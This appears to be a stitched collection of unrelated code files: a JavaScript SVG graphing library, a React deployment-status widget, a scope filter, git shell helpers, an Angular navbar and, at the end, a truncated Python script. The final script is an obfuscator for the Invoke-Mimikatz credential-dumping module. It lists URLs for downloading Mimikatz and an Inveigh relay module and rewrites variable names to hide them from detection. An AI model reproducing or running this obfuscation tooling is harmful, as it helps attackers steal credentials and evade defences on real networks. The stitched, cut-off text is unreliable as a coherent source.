pointElement.setAttribute('vector-effect','non-scaling-stroke');
pointElement.style.fill = pointoptions.pointcolor
gdata.svgElement.appendChild(pointElement);
pointoptions.draggability = pointoptions.draggability || 'no'
if (pointoptions.draggability == 'yes') {
pointoptions.currentlyDraggable = pointoptions.currentlyDraggable || 'yes'
}
else {
pointoptions.currentlyDraggable = pointoptions.currentlyDraggable || 'no'
}
pointoptions.runFunctionOnDragEnd = pointoptions.runFunctionOnDragEnd || ''
pointoptions.runFunctionDuringDrag = pointoptions.runFunctionDuringDrag || ''
if (pointoptions.draggability == 'yes') {
pointElement.addEventListener('mousedown', viewX.pointDrag)
pointElement.addEventListener('touchstart', viewX.pointDrag)
gdata.svgElement.addEventListener('touchmove', viewX.graphTouchDisable)
}
else {
pointElement.style.pointerEvents = 'none'
}
pointoptions.dragDirection = pointoptions.dragDirection || 'bothXY'
pointoptions.dragIfCondition = pointoptions.dragIfCondition || 'true'
viewX.graphData[graphname].pointData[pointname] = [pointElement, pointoptions]
viewX.reverseGraphElementMap[pointElement.id] = [graphname, pointname]
return [pointElement, pointoptions]
}
viewX.updatePoint = function(graphname, pointname, newpointoptions) {
gdata = viewX.graphData[graphname]
pointoptions = gdata.pointData[pointname][1]
pointElement = gdata.pointData[pointname][0]
aratio = gdata.aspectratio
if (pointoptions.x != 0) {
pointoptions.x = newpointoptions.x || pointoptions.x
}
if (pointoptions.y != 0) {
pointoptions.y = newpointoptions.x || pointoptions.y
}
// pointoptions.y = pointoptions.y || 0.3
pointoptions.pointsize = newpointoptions.pointsize || pointoptions.pointsize
pointoptions.pointcolor = newpointoptions.pointcolor || pointoptions.pointcolor
pointElement.setAttribute('cx', viewX.graphToScaledX(pointoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
pointElement.setAttribute('cy', viewX.graphToScaledY(pointoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
pointElement.setAttribute('rx', pointoptions.pointsize + '%')
pointElement.setAttribute('ry', pointoptions.pointsize + '%');
pointElement.setAttribute('vector-effect','non-scaling-stroke');
pointElement.style.fill = pointoptions.pointcolor
pointoptions.draggability = newpointoptions.draggability || 'no'
if (pointoptions.draggability == 'yes') {
pointoptions.currentlyDraggable = newpointoptions.currentlyDraggable || 'yes'
}
else {
pointoptions.currentlyDraggable = newpointoptions.currentlyDraggable || 'no'
}
pointoptions.runFunctionOnDragEnd = newpointoptions.runFunctionOnDragEnd || ''
pointoptions.runFunctionDuringDrag = newpointoptions.runFunctionDuringDrag || ''
pointoptions.dragDirection = newpointoptions.dragDirection || 'bothXY'
pointoptions.dragIfCondition = newpointoptions.dragIfCondition || ''
if (pointoptions.draggability == 'yes') {
pointElement.addEventListener('mousedown', viewX.pointDrag)
pointElement.addEventListener('touchstart', viewX.pointDrag)
}
else {
pointElement.removeEventListener('mousedown', viewX.pointDrag)
pointElement.removeEventListener('touchstart', viewX.pointDrag)
}
viewX.graphData[graphname].pointData[pointname] = [pointElement, pointoptions]
}
viewX.updatePointXY = function(graphname, pointname, xvalue, yvalue) {
pointElement = document.getElementById(graphname + '-point-' + pointname)
gdata = viewX.graphData[graphname]
aratio = gdata.aspectratio
pointoptions = viewX.graphData[graphname].pointData[pointname][1]
pointoptions.x = xvalue
pointoptions.y = yvalue
pointElement.setAttribute('cx', viewX.graphToScaledX(pointoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
pointElement.setAttribute('cy', viewX.graphToScaledY(pointoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
viewX.graphData[graphname].pointData[pointname] = [pointElement, pointoptions]
}
viewX.removePoint = function(graphname, pointname) {
pointElement = document.getElementById(graphname + '-point-' + pointname)
pointElement.outerHTML = "";
delete viewX.graphData[graphname].pointData[pointname]
}
viewX.removeLine = function(graphname, linename) {
lineElement = document.getElementById(graphname + '-line-' + linename)
lineElement.outerHTML = "";
delete viewX.graphData[graphname].lineData[linename]
}
viewX.removeCircle = function(graphname, circlename) {
circleElement = document.getElementById(graphname + '-circle-' + circlename)
circleElement.outerHTML = "";
delete viewX.graphData[graphname].circleData[circlename]
}
viewX.removeText = function(graphname, textname) {
textElement = document.getElementById(graphname + '-text-' + textname)
textElement.outerHTML = "";
delete viewX.graphData[graphname].textData[textname]
}
viewX.removePath = function(graphname, pathname) {
pathElement = document.getElementById(graphname + '-path-' + pathname)
pathElement.outerHTML = "";
delete viewX.graphData[graphname].pathData[pathname]
}
viewX.removeArrow = function(graphname, arrowname) {
arrowElement = document.getElementById(graphname + '-arrow-' + arrowname)
arrowElement.outerHTML = "";
delete viewX.graphData[graphname].arrowData[arrowname]
}
viewX.removeGraph = function(graphname) {
graphElement = document.getElementById(graphname)
graphElement.outerHTML = "";
delete viewX.graphData[graphname]
}
viewX.basicSlider = function(graphname2, slidernamebasic, maxv, minv, currentv, thickness, coordinates) {
options = {}
options.maxvalue = maxv
options.minvalue = minv
options.currentvalue = currentv
options.x1 = coordinates[0][0]
options.y1 = coordinates[0][1]
options.x2 = coordinates[1][0]
options.y2 = coordinates[1][1]
options.strokewidth = thickness
options.automaticallySetKnobRadius = 'yes'
viewX.addSlider(graphname2, slidernamebasic, options)
}
viewX.makeArc = function(arcradius, arcthickness, arccolor, startanglepercent, endanglepercent, ringname) {
resolution = 100
arcpoints = []
for (p = startanglepercent*resolution; p < endanglepercent*(resolution + 1); p++) {
quanta = 2*Math.PI/resolution
arcpoints.push([arcradius*Math.cos(quanta*p), arcradius*Math.sin(quanta*p)])
}
options = {}
options.points = arcpoints
options.pathcolor = arccolor
options.strokewidth = arcthickness
viewX.addPath('ringvisualgraph', ringname, options)
// console.log(options.points)
return arcpoints
}
viewX.makeArcS = function(ringarcnum, arcradius, arcthickness, arccolor, startanglepercent, endanglepercent, ringname) {
resolution = 20
arcpoints = []
for (p = startanglepercent*resolution; p < endanglepercent*(resolution + 1); p++) {
quanta = 2*Math.PI/resolution
arcpoints.push([arcradius*Math.cos(quanta*p), arcradius*Math.sin(quanta*p)])
}
options = {}
options.points = arcpoints
options.pathcolor = arccolor
options.strokewidth = arcthickness
viewX.addPath('ringvisualgraph', ringname, options)
// console.log(options.points)
}
viewX.deleteSegments = function(collection) {
if (typeof collection != 'undefined') {
for (f = 0; f < collection.length; f++) {
collection[f].outerHTML = ''
}
}
}
viewX.randomChoice = function(choicearray) {
return choicearray[parseInt(Math.random()*choicearray.length)]
}
viewX.randomWeightedChoice = function(choicearray, weightArray) {
if (choicearray.length == weightArray.length) {
weightSumA = weightArray.reduce(function(a, b) { return a + b; }, 0);
weightvalueChosen = Math.random()*weightSumA
weightSumZ = 0
for (weightIndex = 0; weightIndex < weightArray.length; weightIndex++) {
weightSumZ = weightSumZ + weightArray[weightIndex]
if (weightSumZ >= weightvalueChosen) {
indexchosenW = weightIndex
break
}
}
return choicearray[indexchosenW]
}
}
viewX.linearValue = function(xv1, xv2, yv1, yv2, inputvl) {
return yv1 + ((inputvl - xv1)/(xv2 - xv1))*(yv2 - yv1)
}
viewX.currentMovingPoint = ''
viewX.pointDrag = function(event) {
gphname = viewX.reverseGraphElementMap[event.target.id][0]
ptname = viewX.reverseGraphElementMap[event.target.id][1]
if (viewX.graphData[gphname].pointData[ptname][1].currentlyDraggable == 'yes') {
if (viewX.graphData[gphname].currentlyDraggableGraph == 'yes') {
document.getElementById(gphname).removeEventListener('mousedown', viewX.graphDragHandle)
document.getElementById(gphname).removeEventListener('touchstart', viewX.graphDragHandle)
}
event.target.removeEventListener('mousedown', viewX.pointDrag)
event.target.removeEventListener('touchstart', viewX.pointDrag)
window.addEventListener('mousemove', viewX.pointMoveEvent)
window.addEventListener('mouseup', viewX.pointUpEvent)
event.preventDefault()
window.addEventListener('touchmove', viewX.pointMoveEvent, { passive: false })
window.addEventListener('touchend', viewX.pointUpEvent)
// window.addEventListener('mouseout', viewX.pointUpEvent)
viewX.currentMovingPoint = event.target
}
}
viewX.svgPTVariable = {}
viewX.pointMoveEvent = function(event) {
event.preventDefault()
gphname = viewX.reverseGraphElementMap[viewX.currentMovingPoint.id][0]
ptname = viewX.reverseGraphElementMap[viewX.currentMovingPoint.id][1]
var rect = document.getElementById(gphname).getBoundingClientRect();
posx = event.clientX - rect.left;
posy = event.clientY - rect.top;
viewX.svgPTVariable[gphname].x = event.clientX;
viewX.svgPTVariable[gphname].y = event.clientY;
if (event.clientX == undefined) {
posx = event.changedTouches[0].clientX - rect.left;
posy = event.changedTouches[0].clientY - rect.top;
viewX.svgPTVariable[gphname].x = event.changedTouches[0].clientX;
viewX.svgPTVariable[gphname].y = event.changedTouches[0].clientY;
}
var cursorpt = viewX.svgPTVariable[gphname].matrixTransform(document.getElementById(gphname).getScreenCTM().inverse());
moveX = viewX.svgToGraphX(cursorpt.x, viewX.graphData[gphname].xmin,viewX.graphData[gphname].xmax, viewX.graphData[gphname].aspectratio)
moveY = viewX.svgToGraphY(cursorpt.y, viewX.graphData[gphname].ymin,viewX.graphData[gphname].ymax, viewX.graphData[gphname].aspectratio)
if (typeof eval(viewX.graphData[gphname].pointData[ptname][1].dragIfCondition) != undefined) {
if (eval(viewX.graphData[gphname].pointData[ptname][1].dragIfCondition) == true) {
if (viewX.graphData[gphname].pointData[ptname][1].dragDirection == 'bothXY') {
viewX.updatePointXY(gphname, ptname, moveX, moveY)
eval(viewX.graphData[gphname].pointData[ptname][1].runFunctionDuringDrag)
}
else if (viewX.graphData[gphname].pointData[ptname][1].dragDirection == 'onlyY') {
viewX.updatePointXY(gphname, ptname, viewX.graphData[gphname].pointData[ptname][1].x, moveY)
eval(viewX.graphData[gphname].pointData[ptname][1].runFunctionDuringDrag)
}
else if (viewX.graphData[gphname].pointData[ptname][1].dragDirection == 'onlyX') {
viewX.updatePointXY(gphname, ptname, moveX, viewX.graphData[gphname].pointData[ptname][1].y)
eval(viewX.graphData[gphname].pointData[ptname][1].runFunctionDuringDrag)
}
}
}
}
viewX.pointUpEvent = function(event) {
gphname = viewX.reverseGraphElementMap[viewX.currentMovingPoint.id][0]
ptname = viewX.reverseGraphElementMap[viewX.currentMovingPoint.id][1]
if (viewX.graphData[gphname].currentlyDraggableGraph == 'yes') {
document.getElementById(gphname).addEventListener('mousedown', viewX.graphDragHandle)
document.getElementById(gphname).addEventListener('touchstart', viewX.graphDragHandle)
}
viewX.currentMovingPoint.addEventListener('mousedown', viewX.pointDrag)
viewX.currentMovingPoint.addEventListener('touchstart', viewX.pointDrag)
window.removeEventListener('mousemove', viewX.pointMoveEvent)
window.removeEventListener('mouseup', viewX.pointUpEvent)
window.removeEventListener('touchmove', viewX.pointMoveEvent)
window.removeEventListener('touchend', viewX.pointUpEvent)
// window.removeEventListener('mouseout', viewX.pointUpEvent)
eval(viewX.graphData[gphname].pointData[ptname][1].runFunctionOnDragEnd)
}
viewX.wheelHandle = function(event) {
event.preventDefault();
whlvalue = (event.wheelDeltaY)/Math.abs(event.wheelDeltaY)
if (event.wheelDeltaY == undefined) {
whlvalue = (event.deltaY)/Math.abs(event.deltaY)
// For FireFox
}
scalefactorup = 1.1
scalefactordown = 0.9
if(viewX.graphData[event.target.id.split('-')[0]] == undefined) {
}
else {
gdata = viewX.graphData[event.target.id.split('-')[0]]
scale = gdata.ymax - gdata.ymin
expstring = scale.toExponential().toString()
ordery = (expstring.slice(expstring.indexOf('e') + 1)*(-1))
// console.log(ordery)
scale = gdata.xmax - gdata.xmin
expstring = scale.toExponential().toString()
orderx = (expstring.slice(expstring.indexOf('e') + 1)*(-1))
// console.log(orderx)
gphname = gdata.name
var rect = document.getElementById(gphname).getBoundingClientRect();
posx = event.clientX - rect.left;
posy = event.clientY - rect.top;
viewX.svgPTVariable[gphname].x = event.clientX;
viewX.svgPTVariable[gphname].y = event.clientY;
if (event.clientX == undefined) {
posx = event.changedTouches[0].clientX - rect.left;
posy = event.changedTouches[0].clientY - rect.top;
viewX.svgPTVariable[gphname].x = event.changedTouches[0].clientX;
viewX.svgPTVariable[gphname].y = event.changedTouches[0].clientY;
}
var cursorpt = viewX.svgPTVariable[gphname].matrixTransform(document.getElementById(gphname).getScreenCTM().inverse());
zoomlocationX = viewX.svgToGraphX(cursorpt.x, viewX.graphData[gphname].xmin,viewX.graphData[gphname].xmax, viewX.graphData[gphname].aspectratio)
zoomlocationY = viewX.svgToGraphY(cursorpt.y, viewX.graphData[gphname].ymin,viewX.graphData[gphname].ymax, viewX.graphData[gphname].aspectratio)
currentvalues = viewX.graphData[gphname]
posx = posx/rect.width
posy = posy/rect.height
if (posx > 0.11 && posx < 0.89 && posy > 0.11 && posy < 0.89) {
if (whlvalue < 0) {
scaleupdownFactor = scalefactorup
leftX = (zoomlocationX - currentvalues.xmin)*scaleupdownFactor
newZXmin = zoomlocationX - leftX
rightX = (currentvalues.xmax - zoomlocationX)*scaleupdownFactor
newZXmax = zoomlocationX + rightX
leftY = (zoomlocationY - currentvalues.ymin)*scaleupdownFactor
newZYmin = zoomlocationY - leftY
rightY = (currentvalues.ymax - zoomlocationY)*scaleupdownFactor
newZYmax = zoomlocationY + rightY
options = {}
options.xmin = newZXmin
options.xmax = newZXmax
options.ymin = newZYmin
options.ymax = newZYmax
viewX.updateGraphZoom(gphname, options)
}
else if (whlvalue >= 0 && orderx < 14 && ordery < 14) {
scaleupdownFactor = scalefactordown
leftX = (zoomlocationX - currentvalues.xmin)*scaleupdownFactor
newZXmin = zoomlocationX - leftX
rightX = (currentvalues.xmax - zoomlocationX)*scaleupdownFactor
newZXmax = zoomlocationX + rightX
leftY = (zoomlocationY - currentvalues.ymin)*scaleupdownFactor
newZYmin = zoomlocationY - leftY
rightY = (currentvalues.ymax - zoomlocationY)*scaleupdownFactor
newZYmax = zoomlocationY + rightY
options = {}
options.xmin = newZXmin
options.xmax = newZXmax
options.ymin = newZYmin
options.ymax = newZYmax
viewX.updateGraphZoom(gphname, options)
}
}
}
}
viewX.currentMovingGraph = ''
viewX.currentMovingGraphStartLocation = []
viewX.graphDragHandle = function(event) {
event.preventDefault();
gphname = event.target.id.split('-')[0]
if (viewX.graphData[gphname].currentlyDraggableGraph == 'yes') {
viewX.graphData[gphname].svgElement.removeEventListener('mousedown', viewX.graphDragHandle)
viewX.graphData[gphname].svgElement.removeEventListener('touchstart', viewX.graphDragHandle)
window.addEventListener('mousemove', viewX.graphDragMoveEvent)
window.addEventListener('mouseup', viewX.graphDragUpEvent)
event.preventDefault()
window.addEventListener('touchmove', viewX.graphDragMoveEvent, { passive: false })
window.addEventListener('touchend', viewX.graphDragUpEvent)
// window.addEventListener('mouseout', viewX.pointUpEvent)
viewX.currentMovingGraph = viewX.graphData[gphname].svgElement
var rect = document.getElementById(gphname).getBoundingClientRect();
posx = event.clientX - rect.left;
posy = event.clientY - rect.top;
viewX.svgPTVariable[gphname].x = event.clientX;
viewX.svgPTVariable[gphname].y = event.clientY;
if (event.clientX == undefined) {
posx = event.changedTouches[0].clientX - rect.left;
posy = event.changedTouches[0].clientY - rect.top;
viewX.svgPTVariable[gphname].x = event.changedTouches[0].clientX;
viewX.svgPTVariable[gphname].y = event.changedTouches[0].clientY;
}
var cursorpt = viewX.svgPTVariable[gphname].matrixTransform(document.getElementById(gphname).getScreenCTM().inverse());
tapX = viewX.svgToGraphX(cursorpt.x, viewX.graphData[gphname].xmin,viewX.graphData[gphname].xmax, viewX.graphData[gphname].aspectratio)
tapY = viewX.svgToGraphY(cursorpt.y, viewX.graphData[gphname].ymin,viewX.graphData[gphname].ymax, viewX.graphData[gphname].aspectratio)
viewX.currentMovingGraphStartLocation = [tapX, tapY]
currentMovingGraphOriginalBounds = [viewX.graphData[gphname].xmin, viewX.graphData[gphname].xmax, viewX.graphData[gphname].ymin, viewX.graphData[gphname].ymax]
viewX.currentMovingGraph.style.cursor = 'move'
}
}
viewX.clientToGraph = function(clientValues, graphNameInput) {
viewX.svgPTVariable[graphNameInput].x = clientValues[0];
viewX.svgPTVariable[graphNameInput].y = clientValues[1];
var cursorpt = viewX.svgPTVariable[gphname].matrixTransform(document.getElementById(gphname).getScreenCTM().inverse());
return [svgToGraphX(cursorpt.x, viewX.graphData[gphname].xmin,viewX.graphData[gphname].xmax, viewX.graphData[gphname].aspectratio), viewX.svgToGraphY(cursorpt.y, viewX.graphData[gphname].ymin,viewX.graphData[gphname].ymax, viewX.graphData[gphname].aspectratio)]
}
viewX.graphPinchMoveEvent = function(event) {
if (event.changedTouches.length == 2) {
gphname = event.target.id.split('-')[0]
touch1 = [event.changedTouches[0].clientX, event.changedTouches[0].clientY]
touch2 = [event.changedTouches[1].clientX, event.changedTouches[1].clientY]
touch1 = viewX.clientToGraph(touch1, gphname)
touch2 = viewX.clientToGraph(touch2, gphname)
oldtouch1 = viewX.clientToGraph(viewX.pinchStartData[0], gphname)
oldtouch2 = viewX.clientToGraph(viewX.pinchStartData[1], gphname)
pinchScale = viewX.distF(oldtouch1, oldtouch2)/viewX.distF(touch1, touch2)
pinchStartMidpoint = [(oldtouch1[0] + oldtouch2[0])/2, (oldtouch1[1] + oldtouch2[1])/2]
zoomlocationX = pinchStartMidpoint[0]
zoomlocationY = pinchStartMidpoint[1]
gdata = viewX.graphData[gphname]
scale = gdata.ymax - gdata.ymin
expstring = scale.toExponential().toString()
ordery = (expstring.slice(expstring.indexOf('e') + 1)*(-1))
// console.log(ordery)
scale = gdata.xmax - gdata.xmin
expstring = scale.toExponential().toString()
orderx = (expstring.slice(expstring.indexOf('e') + 1)*(-1))
// console.log(orderx)
currentvalues = viewX.graphData[gphname]
scaleFactorForTouch = 1
if (pinchScale <= 1) {
scaleFactorForTouch = viewX.linearValue(0, 1, 0.9, 1, pinchScale)
}
else {
scaleFactorForTouch = viewX.linearValue(1, 5, 1, 1.1, pinchScale)
}
leftX = (zoomlocationX - currentvalues.xmin)*scaleFactorForTouch
newZXmin = zoomlocationX - leftX
rightX = (currentvalues.xmax - zoomlocationX)*scaleFactorForTouch
newZXmax = zoomlocationX + rightX
leftY = (zoomlocationY - currentvalues.ymin)*scaleFactorForTouch
newZYmin = zoomlocationY - leftY
rightY = (currentvalues.ymax - zoomlocationY)*scaleFactorForTouch
newZYmax = zoomlocationY + rightY
options = {}
options.xmin = newZXmin
options.xmax = newZXmax
options.ymin = newZYmin
options.ymax = newZYmax
viewX.updateGraphZoom(gphname, options)
// console.log(pinchStartMidpoint)
}
}
viewX.graphPinchEndEvent = function(event) {
viewX.pinchZoom = false
window.removeEventListener('touchmove', viewX.graphPinchMoveEvent)
window.removeEventListener('touchend', viewX.graphPinchEndEvent)
}
viewX.pinchZoom = false
viewX.pinchStartData = []
viewX.graphDragMoveEvent = function(event) {
event.preventDefault()
gphname = viewX.currentMovingGraph.id
var rect = document.getElementById(gphname).getBoundingClientRect();
posx = event.clientX - rect.left;
posy = event.clientY - rect.top;
viewX.svgPTVariable[gphname].x = event.clientX;
viewX.svgPTVariable[gphname].y = event.clientY;
touchEventDetect = 0
if (event.clientX == undefined) {
posx = event.changedTouches[0].clientX - rect.left;
posy = event.changedTouches[0].clientY - rect.top;
viewX.svgPTVariable[gphname].x = event.changedTouches[0].clientX;
viewX.svgPTVariable[gphname].y = event.changedTouches[0].clientY;
if (event.changedTouches.length == 2) {
oldtouch1 = [event.changedTouches[0].clientX, event.changedTouches[0].clientY]
oldtouch2 = [event.changedTouches[1].clientX, event.changedTouches[1].clientY]
viewX.pinchStartData = [oldtouch1, oldtouch2]
dummyEve = {}
viewX.pinchZoom = true
viewX.graphDragUpEvent(dummyEve)
window.addEventListener('touchmove', viewX.graphPinchMoveEvent)
window.addEventListener('touchend', viewX.graphPinchEndEvent)
}
touchEventDetect = event.changedTouches[0].identifier
}
if (viewX.pinchZoom == false && touchEventDetect == 0) {
var cursorpt = viewX.svgPTVariable[gphname].matrixTransform(document.getElementById(gphname).getScreenCTM().inverse());
moveX = viewX.svgToGraphX(cursorpt.x, viewX.graphData[gphname].xmin,viewX.graphData[gphname].xmax, viewX.graphData[gphname].aspectratio)
moveY = viewX.svgToGraphY(cursorpt.y, viewX.graphData[gphname].ymin,viewX.graphData[gphname].ymax, viewX.graphData[gphname].aspectratio)
deltaVecX = moveX - viewX.currentMovingGraphStartLocation[0]
deltaVecY = moveY - viewX.currentMovingGraphStartLocation[1]
currentvalues = viewX.graphData[gphname]
newZXmin = currentvalues.xmin - deltaVecX
newZXmax =currentvalues.xmax - deltaVecX
newZYmin = currentvalues.ymin - deltaVecY
newZYmax = currentvalues.ymax - deltaVecY
if (typeof eval(viewX.graphData[gphname].dragIfCondition) != undefined) {
if (eval(viewX.graphData[gphname].dragIfCondition) == true) {
if (viewX.graphData[gphname].dragDirection == 'bothXY') {
options = {}
options.xmin = newZXmin
options.xmax = newZXmax
options.ymin = newZYmin
options.ymax = newZYmax
viewX.updateGraphZoom(gphname, options)
eval(viewX.graphData[gphname].runFunctionDuringDrag)
}
else if (viewX.graphData[gphname].dragDirection == 'onlyY') {
options = {}
options.ymin = newZYmin
options.ymax = newZYmax
viewX.updateGraphZoom(gphname, options)
eval(viewX.graphData[gphname].runFunctionDuringDrag)
}
else if (viewX.graphData[gphname].dragDirection == 'onlyX') {
options = {}
options.xmin = newZXmin
options.xmax = newZXmax
viewX.updateGraphZoom(gphname, options)
eval(viewX.graphData[gphname].runFunctionDuringDrag)
}
}
}
}
}
viewX.graphDragUpEvent = function(event) {
gphname = viewX.currentMovingGraph.id
viewX.currentMovingGraph.addEventListener('mousedown', viewX.graphDragHandle)
viewX.currentMovingGraph.addEventListener('touchstart', viewX.graphDragHandle)
window.removeEventListener('mousemove', viewX.graphDragMoveEvent)
window.removeEventListener('mouseup', viewX.graphDragUpEvent)
window.removeEventListener('touchmove', viewX.graphDragMoveEvent)
window.removeEventListener('touchend', viewX.graphDragUpEvent)
// window.removeEventListener('mouseout', viewX.pointUpEvent)
eval(viewX.graphData[gphname].runFunctionOnDragEnd)
viewX.currentMovingGraph.style.cursor = 'auto'
}
viewX.graphTouchDisable = function(event) {
event.preventDefault()
}
// other code
dmode = 'square'
if (1.25*window.innerWidth < window.innerHeight && window.innerWidth < window.innerHeight) {
dmode = 'portrait'
}
else if (window.innerWidth > 1.3*window.innerHeight && window.innerWidth > window.innerHeight) {
dmode = 'landscape'
}
viewX.setFont = function(divCollection, fontval) {
for (divN = 0; divN < divCollection.length; divN++) {
document.getElementById(divCollection[divN]).style.fontSize = fontval
}
}
viewX.distF = function(pt1, pt2) {
return Math.pow(Math.pow(pt1[0] - pt2[0], 2) + Math.pow(pt1[1] - pt2[1], 2), 0.5)
}
viewX.addVec = function(pt1, pt2) {
return [pt1[0] + pt2[0], pt1[1] + pt2[1]]
}
viewX.directionVec = function(pt1, pt2) {
diff = [pt2[0] - pt1[0], pt2[1] - pt1[1]]
difflen = viewX.distF(diff, [0,0])
return [diff[0]/difflen, diff[1]/difflen]
}
viewX.rotatedVec = function(ofVector, angle) {
angle = angle*Math.PI/180;
rotatedXV = ofVector[0]*Math.cos(angle) - ofVector[1]*Math.sin(angle);
rotatedYV = ofVector[0]*Math.sin(angle) + ofVector[1]*Math.cos(angle);
return [rotatedXV, rotatedYV]
}
viewX.mod = function(ofVector) {
return viewX.distF(ofVector, [0,0])
}
viewX.shuffle = function(array) {
var currentIndex = array.length, temporaryValue, randomIndex;
// While there remain elements to shuffle...
while (0 !== currentIndex) {
// Pick a remaining element...
randomIndex = Math.floor(Math.random() * currentIndex);
currentIndex -= 1;
// And swap it with the current element.
temporaryValue = array[currentIndex];
array[currentIndex] = array[randomIndex];
array[randomIndex] = temporaryValue;
}
return array;
}
viewX.uid = 0
viewX.graphData = {}
viewX.reverseGraphElementMap = {}
viewX.darkmode = false; |
<filename>src/js/components/deployments/deploymentstatus.js
import React from 'react';
const defaultStats = {
success: 0,
decommissioned: 0,
pending: 0,
failure: 0,
downloading: 0,
installing: 0,
rebooting: 0,
noartifact: 0,
aborted: 0,
'already-installed': 0
};
export default class DeploymentStatus extends React.PureComponent {
componentDidUpdate(prevProps) {
var self = this;
if (prevProps.id !== self.props.id) {
self.props.refreshStatus(self.props.id);
}
if (!self.props.isActiveTab) {
clearInterval(self.timer);
}
// isActive has changed
if (!prevProps.isActiveTab && self.props.isActiveTab && self.props.refresh) {
self.timer = setInterval(() => self.props.refreshStatus(self.props.id), 10000);
}
if (
prevProps.stats !== self.props.stats &&
self.props.stats &&
self.props.stats.downloading + self.props.stats.installing + self.props.stats.rebooting + self.props.stats.pending <= 0
) {
// if no more devices in "progress" statuses, send message to parent that it's finished
clearInterval(self.timer);
self.props.setFinished(true);
}
}
componentDidMount() {
var self = this;
if (self.props.refresh) {
self.timer = setInterval(() => self.props.refreshStatus(self.props.id), 10000);
}
self.props.refreshStatus(self.props.id);
}
componentWillUnmount() {
clearInterval(this.timer);
}
render() {
let { stats } = this.props;
stats = stats ? stats : defaultStats;
var inprogress = stats.downloading + stats.installing + stats.rebooting;
var failed = stats.failure;
var skipped = stats.aborted + stats.noartifact + stats['already-installed'] + stats.decommissioned;
const phases = [
{ title: 'Skipped', value: skipped, className: 'skipped' },
{ title: 'Pending', value: stats.pending, className: 'pending' },
{ title: 'In progress', value: inprogress, className: 'inprogress' },
{ title: 'Successful', value: stats.success, className: 'success' },
{ title: 'Failed', value: failed, className: 'failure' }
];
return (
<div>
<div className={this.props.vertical ? 'results-status vertical' : 'results-status'}>
{phases.map(phase => (
<div key={phase.className} className={phase.value ? 'hint--bottom' : 'hint--bottom disabled'} aria-label={phase.title}>
<span className={`status ${phase.className}`}>{(phase.value || 0).toLocaleString()}</span>
{this.props.vertical && <span className="label">{phase.title}</span>}
</div>
))}
</div>
</div>
);
}
}
|
var SCOPES = {
user: [
'username',
'avatar',
'id',
'prefLocale'
],
email: [
'email'
]
};
module.exports = {
filterUserForScopes: function(user, scopes) {
var filtered = {};
scopes.forEach(function(scope) {
var scopeAttrs = SCOPES[scope];
if ( scopeAttrs ) {
scopeAttrs.forEach(function(attr) {
filtered[attr] = user[attr];
});
}
});
filtered.scope = scopes;
return filtered;
}
};
|
function bunmit() {
echo "Checking gems to update..."
bundle update && bundle exec rake test && git add Gemfile Gemfile.lock && git commit -m "Gem update" && git push
echo "Update done"
}
function furypush() {
echo "Fury pushing..."
git push origin master && git push origin develop && git push --tags && git push fury master
echo "Fury pushed"
}
function gdl() {
echo -e "Deleting remoteless local git branches..."
git fetch -p && git branch -vv | grep 'origin/.*: gone]' | awk '{print $1}' | xargs git branch -d
echo -e "Deleting local branches"
}
function gfdl() {
echo -e "Force deleting remoteless local git branches..."
git fetch -p && git branch -vv | grep 'origin/.*: gone]' | awk '{print $1}' | xargs git branch -D
echo -e "Force deleting local branches"
}
|
export class CredentialsDto {
username: string;
jwtToken: string;
}
|
import { Component, OnInit, Input } from '@angular/core';
import { MenuItem } from '@core/modelo/menu-item';
import { Comercio } from '@shared/modelo/comercio';
import { ComercioService } from '@shared/service/comercio.service';
import { Observable } from 'rxjs';
@Component({
selector: 'app-navbar',
templateUrl: 'navbar.component.html',
styles: [],
})
export class NavbarComponent implements OnInit {
public listaComercios: Observable<Comercio[]>;
public comercioSeleccionado: string;
@Input()
items: MenuItem[];
constructor(protected comercioService: ComercioService) { }
ngOnInit() {
this.comercioSeleccionado = 'Seleccione un comercio';
this.listaComercios = this.comercioService.consultar();
}
seleccionarComercio(comercio: Comercio): void {
this.comercioService.seleccionar(comercio);
this.comercioSeleccionado = comercio.nombre;
}
}
|
<gh_stars>1-10
#!/usr/bin/python
import os, sys, re, random, argparse
import requests, OpenSSL, string
from argparse import RawTextHelpFormatter
from classes.bcolours import *
from classes.banner import *
#
# Invoke-mimikatz.ps1 obfuscator
# Download Mimikatz Powershell module, change variable names, remove comments etc.
# pip install requests==2.11.1
# Global variables:
__author__ = "<NAME> (loneferret)"
__license__ = "Apache License 2.0"
__version__ = "0.2.1"
__status__ = "Prototype"
#Passed URLs:
#MIMIURL = 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'
#MIMIURL = 'https://goo.gl/TRkLKn'
#Current URLs:
#MIMIURL = 'https://raw.githubusercontent.com/EmpireProject/Empire/2.0_beta/data/module_source/credentials/Invoke-Mimikatz.ps1'
#INVEIGHRELAY = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/lateral_movement/Invoke-InveighRelay.ps1'
MIMIURL = 'https://goo.gl/s18PdR'
INVEIGHRELAY = 'https://goo.gl/1507jm'
TEST = 'http://1192.168.127.12:8000/test.ps1'
PSHscript = ''
# List of variable names to ignore in hopes not to break stuff
IGNORE = ['$true','$false','Main','Invoke','$True','$False','$_','$args','$Bytes', #'Get',
'$ExeArgs', '$Win32Constants','Win32Constants','Win32Functions','$Win32Functions',
'Get-PEBasicInfo','$PEBytes', '$PEHandle','PEHandle','$PELoadedInfo','ExeArgs',
'$Win32Types','Win32Types','PEInfo','$PEInfo','$StartAddress','StartAddress',
'Size','$Size','$OriginalImageBase','OriginalImageBase']
"""
TODO:
High:
- Still don't like how I'm chaning variable names
- Fine tune the comments regex - DONE
- Get that Invoke thing out of the way if not needed - DONE (kinda)
"""
def writeNewFile(newContent):
# Writes the file Powershell file
newPSH = file('obfuscated.ps1', 'w')
for i in newContent:
newPSH.write(str(i)+"\n")
return True
def removeEmptyLines(content):
# Remove empty lines
newlines = []
for i in content:
if(i.strip()):
newlines.append(i)
else:
continue
return newlines
def makeRandom(size=8, chars=string.ascii_uppercase + string.ascii_lowercase):
# http://stackoverflow.com/questions/2257441/random-string-generation-with-upper-case-letters-and-digits-in-python
return ''.join(random.choice(chars) for _ in range(size))
def replaceFunctionCalls(content, oldName, newName):
# Searches the file to replace original function names with new name
newlines = []
for line in content:
if(oldName.endswith(')')):
newlines.append(line.replace(oldName, newName+'()'))
else:
